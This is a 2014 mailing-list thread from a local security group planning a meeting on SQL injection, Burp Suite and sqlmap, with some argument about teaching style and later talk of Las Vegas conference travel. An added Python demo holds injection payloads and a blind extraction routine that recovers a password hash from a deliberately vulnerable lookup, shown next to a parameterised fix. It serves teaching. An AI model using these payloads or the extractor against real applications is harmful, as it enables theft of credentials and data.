Meeting in May


cmcm...@hackucf.org

May 12, 2014, 11:36:37 PM
to dc...@googlegroups.com
Hey guys,

I just wanted to get conversation going about a meeting this month. Any plans yet?

L.T. Easterly

May 12, 2014, 11:41:26 PM
My schedule has flipped to early week so I'm now available on Fridays again, so I should be available to attend.


--
You received this message because you are subscribed to the Google Groups "DC407" group.
To unsubscribe from this group and stop receiving emails from it, send an email to dc407+un...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.

He Hatsalot

May 13, 2014, 8:34:40 AM
I have some draft stuff for 'The Intrusion Surface'.

fail open

May 13, 2014, 8:39:56 AM

Anyone want to do a discussion on Burp Suite and cover SQL injection? Potentially migrate into sqlmap? Couple tools and a concept wrapped in one?


Willa Riggins

May 13, 2014, 9:24:31 AM
I like this. I've done it, but I won't pretend to know everything about it. Maybe set up Mutillidae or WebGoat and pwn it with the tools? That or I can write a custom vuln app. Either way.

~ willa

fail open

May 13, 2014, 9:26:44 AM

I can bring Metasploitable 2, which has Mutillidae on it. Works well enough for this.

fail open

May 13, 2014, 9:28:43 AM

How long do you think the attack surfaces discussion will go? Want to give it the time it deserves and can fill in with tool discussions.

He Hatsalot

May 13, 2014, 9:35:50 AM
If anyone does a talk on specific tools, later on in the real world the students will give up the moment the tool can't do it.  This happens all the time in the real world, hence the "Page is too dynamic" error from SQLMap. 

Why not actually teach people SQL and then teach them how to do real SQL injection?  It would likely take a similar amount of time, the difference being that they would actually be able to survive in real-world pentests.

I did a talk on SQL injection at DC407 a couple years ago.  I can grab the old materials for that if you like.



fail open

May 13, 2014, 9:39:02 AM

I want to have the topics covered, plus discuss tools that are out there to see pros and cons of what exists, but the idea is to cover all areas to help awareness in the world. As a consultant, when I have 4 days to test 1000 systems, one has to rely on everything available, which means understanding the attacks but also utilizing any tools that one can.

He Hatsalot

May 13, 2014, 9:41:02 AM
I certainly hope you don't tell your client that the 1000 system scan over four days was anything resembling thorough.

Really, you should know how to write your own SQL injection tool, that way you can just fix sqlmap or another tool when it breaks or gives up. That said, you would still have to know how to do SQL injection by hand to do that.

He Hatsalot

May 13, 2014, 9:41:23 AM
That depends on how in-depth you want it to be.  I initially planned for something like a 30-45 minute time block, but I can use more or less time as needed.

fail open

May 13, 2014, 9:44:06 AM

So, not everyone knows how to do everything from day one. Should you know every aspect of everything? Sure. Is that realistic for every person at every stage of their learning? Not at all. The goal here is to teach and give exposure. It's the second meeting for some people. Have to start some place.

Tony Turner

May 13, 2014, 11:26:37 AM

I'd recommend you start with SQL 101 and VERY basic manual SQLi demonstrations without complicated unions and joins and introduce a tool like sqlmap for the first presentation. Then follow up next time with more advanced manual testing, show blind SQLi, what to do when tools fail, etc.
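As an added, self-contained illustration of the progression sketched in the message above (SQL 101, a basic manual SQLi, then blind SQLi and what to do when tools fail), and of the earlier point in the thread that a tester should be able to write a small injection tool by hand, here is an example written for this page; it is not code from the thread or from any DC407 member. Everything in it is constructed: an in-memory SQLite table named `users` with a hypothetical `admin` row, a deliberately vulnerable lookup beside its parameterised fix, a page whose content changes on every request (the situation where a tool comparing whole responses gives up), and a hand-written boolean oracle that keys on a stable marker string instead.

```python
import hashlib
import itertools
import sqlite3

# Constructed demo data (hypothetical, not from any real system).
ADMIN_HASH = hashlib.sha256(b"correct horse").hexdigest()

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, pwhash TEXT)")
conn.executemany(
    "INSERT INTO users (username, pwhash) VALUES (?, ?)",
    [("admin", ADMIN_HASH), ("alice", hashlib.sha256(b"hunter2").hexdigest())],
)

_request_counter = itertools.count()


def render(found):
    """Render a 'dynamic' page: a per-request counter makes every response differ,
    so comparing whole pages is useless; only the marker text is stable."""
    marker = "Welcome back" if found else "Unknown user"
    return f"<html><!-- req {next(_request_counter)} --><p>{marker}</p></html>"


def vulnerable_page(username):
    """Deliberately vulnerable lookup: user input is concatenated into the SQL."""
    sql = f"SELECT id FROM users WHERE username = '{username}'"
    return render(conn.execute(sql).fetchone() is not None)


def safe_page(username):
    """Hardened lookup: a parameterised query, so input never becomes SQL."""
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return render(row is not None)


def oracle(page_fn, payload):
    """Boolean oracle keyed on a stable marker, not on whole-page equality."""
    return "Welcome back" in page_fn(payload)


def tautology_bypass(page_fn):
    """SQL 101: close the string literal and append an always-true condition."""
    return oracle(page_fn, "' OR '1'='1")


def extract_blind(page_fn, column, where, max_len=64):
    """Boolean-based blind extraction of one column value, character by character.

    Each payload turns the query into  ... WHERE username = '' OR <cond> AND '1'='1'
    AND binds tighter than OR, so a row comes back exactly when <cond> holds.
    The code point of each character is found by binary search over 0..127
    (7 queries per character instead of up to 128).
    """
    target = f"(SELECT {column} FROM users WHERE {where})"
    value = ""
    for pos in range(1, max_len + 1):
        if not oracle(page_fn, f"' OR length({target}) >= {pos} AND '1'='1"):
            break  # no character at this position: value fully extracted
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = f"unicode(substr({target}, {pos}, 1)) > {mid}"
            if oracle(page_fn, f"' OR {cond} AND '1'='1"):
                lo = mid + 1
            else:
                hi = mid
        value += chr(lo)
    return value


if __name__ == "__main__":
    print("tautology vs vulnerable:", tautology_bypass(vulnerable_page))  # True
    print("tautology vs safe:      ", tautology_bypass(safe_page))        # False
    print("blind-extracted hash:   ", extract_blind(vulnerable_page, "pwhash", "username = 'admin'"))
    print("same against safe page: ", repr(extract_blind(safe_page, "pwhash", "username = 'admin'")))
```

Run as a script it prints the tautology result against both lookups, then recovers the full 64-character hash from the vulnerable page in a few hundred requests and gets nothing back from the parameterised one. The design point is the oracle: because the response carries a changing counter, two fetches of the same page never match byte for byte, so the oracle checks for the marker text and nothing else, which is exactly the adjustment a hand-written tool lets you make when an automated one reports the page as too dynamic.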

Willa Riggins

May 13, 2014, 11:45:58 AM
Or we can just let the guy that volunteered to do a talk on sqlmap do his thing, and everyone that's bitching can do their own presentations. I'm kind of pissed off at the list right now. Mostly at Hatter for being a douche to failopen. I'm trying to be quiet though, because I don't want to piss anyone else off -- it's not worth it.

Last meeting, honestly, was not enjoyable for me for a number of reasons. Everyone in the room was afraid to talk because there were a couple voices dominating the room and making everyone else feel like shit. That's not what this group is about. No one cares how scene you are, they just want to learn stuff. If they need to learn SQL, they aren't going to do it at a DC407. They're going to go home after seeing a presentation on sqlmap and a discussion on SQLi and learn everything on their own.

If we're going to have a damn pissing contest every month, I'm out.

fail open

May 13, 2014, 11:56:08 AM

Personally what I'd like to see is someone covering SQLi, someone covering Burp and someone covering sqlmap.

The idea is to get people to jump in and participate. I was just throwing out topic ideas. Personally I'm a fan of Burp so could lead that discussion.

If someone wants to go in nice and deep for SQLi as a starting point that works. Step up and do so.

Tony Turner

May 13, 2014, 12:34:38 PM
I didn't mean to suggest that anyone was taking the wrong approach for teaching SQLi, it was more of a counter to the criticism levied at not teaching ONLY the manual way. I do understand where Hatter was coming from as his points are VERY valid, but perhaps a bit misplaced for someone starting at ground 0. I think probably the biggest thing is ensuring folks feel welcome and I would encourage an inclusive culture for DC407. There is enough elitist douchebaggery at DEF CON, we don't need to bring it back to the 407. I wasn't at the last meeting so don't know if that's how it was, but the efforts of the last 2-3 years through B-Sides Orlando have been focused on building community, not tearing it apart.

I like Fail's suggestion as this directly addresses my biggest issue with how we did DC407 in the past, and that was a focus on a few speakers who carried the majority of the content. I think distributing across multiple members helps to bring fresh perspectives to content and empowers the members to get involved. I hope that even the new members can feel they have something to contribute. Ideally, each of us would pick a topic, and even if we don't know it very well today we go learn more about it and bring what we've learned back to the group and share the knowledge. Even newcomers should be able to do that. It wouldn't have to be a complex topic, and you shouldn't feel like you need to be an expert just to share what you've learned. That might be enough to get conversation going on the topic and several of us could contribute through that discussion. It might be a tool, a protocol, a cool new attack or vulnerability you heard about on Twitter or a mailing list.

Lastly, we all know we have some different personalities and perspectives in our community, and that's OK. Let's try not to judge, or fit anyone into a specific category. Just stay calm and keep an open mind, be respectful of everyone else, but don't be afraid to call any of us on our bullshit if we step out of line. I hope I can make the next meeting, but I do have some heavy travel coming up so I'm not sure yet. I have every confidence in this group though, and that includes all of you. Collectively there is a lot of talent here in central FL, and as the students at UCF have shown us there is a hunger for learning here that is unrivaled.

-Tony
Tony Turner
OWASP Orlando Chapter Founder/Co-Leader
tony....@owasp.org

He Hatsalot

May 13, 2014, 12:44:51 PM
Ok, this will work:
I want no future involvement.  Have fun at your next meeting.  Best of luck to you all; it looks like I'm not socially compatible with the group.

David Swain

Jun 12, 2014, 4:07:47 PM
Anyone here planning on going to b-sides in vegas?

-David

Tony Turner

Jun 12, 2014, 4:09:18 PM
I'll be there all week, definitely doing B-Sides!

g3k

Jun 12, 2014, 4:10:21 PM
I'm not sure to be honest. I'm gonna try to go out to the shoot. Not sure with how they moved it this year. 

Willa Riggins

Jun 12, 2014, 4:15:40 PM
Not this year, but BSidesLV is the best. I'll be at derby though.


David Swain

Jun 12, 2014, 4:25:55 PM
I stayed at the Rio last time I went out to defcon in 2012, however it cost a ton (I usually stay for like 5 or 6 days) and this is out of pocket so I think I'm gonna camp out at the Tuscany for the whole b-sides/defcon.

I miss defcon being at the Alexis Park and this totally reminds me of those days. Anyhow we should meet up, share cabs to the Rio, stories over beer, etc. I think I'm going to be there from the 5th to the 11th or something like that.

-David

Jonathan Singer

Jun 12, 2014, 4:28:19 PM
I'll be there! Not the whole time, but i'll make an appearance.

g3k

Jun 12, 2014, 4:29:36 PM
Tuscany is great, but cabs were hard to come by. Tony, Jess, Luis and I did the same thing last year. Just be aware that you may be waiting for a while. There were a couple of times where we went in with other people on a limo so we could just get there, and it ran about the fare of a taxi to the Rio per person.

Jonathan Singer

Jun 12, 2014, 4:31:31 PM
That's why I got a car Tues-Thurs :)


fail open

Jun 12, 2014, 4:33:07 PM

I'm there Monday to Monday, will be working Bsides reg most likely or drunk by pool.

Tony Turner

Jun 12, 2014, 4:37:21 PM

I need cherries again. Lots of cherries! ;)
